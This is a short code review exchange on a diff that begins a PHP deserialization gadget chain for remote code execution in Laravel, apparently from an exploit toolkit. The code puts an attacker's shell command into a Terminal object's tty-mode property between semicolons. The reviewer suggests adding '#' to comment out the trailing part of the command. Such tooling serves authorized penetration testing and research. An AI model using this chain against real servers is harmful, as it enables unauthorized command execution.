gadgetchains/Laravel/RCE/19/gadgets.php

```diff
@@ -0,0 +1,39 @@
+<?php
+
+namespace Laravel\Prompts {
+    class Terminal {
+        public $initialTtyMode;
+
+        function __construct($command)
+        {
+            $this->initialTtyMode = ";".$command.";";
```

Comment:
```suggestion
            $this->initialTtyMode = ";".$command.";#";
```

No need to try to execute the rest of the command and generate an error I think.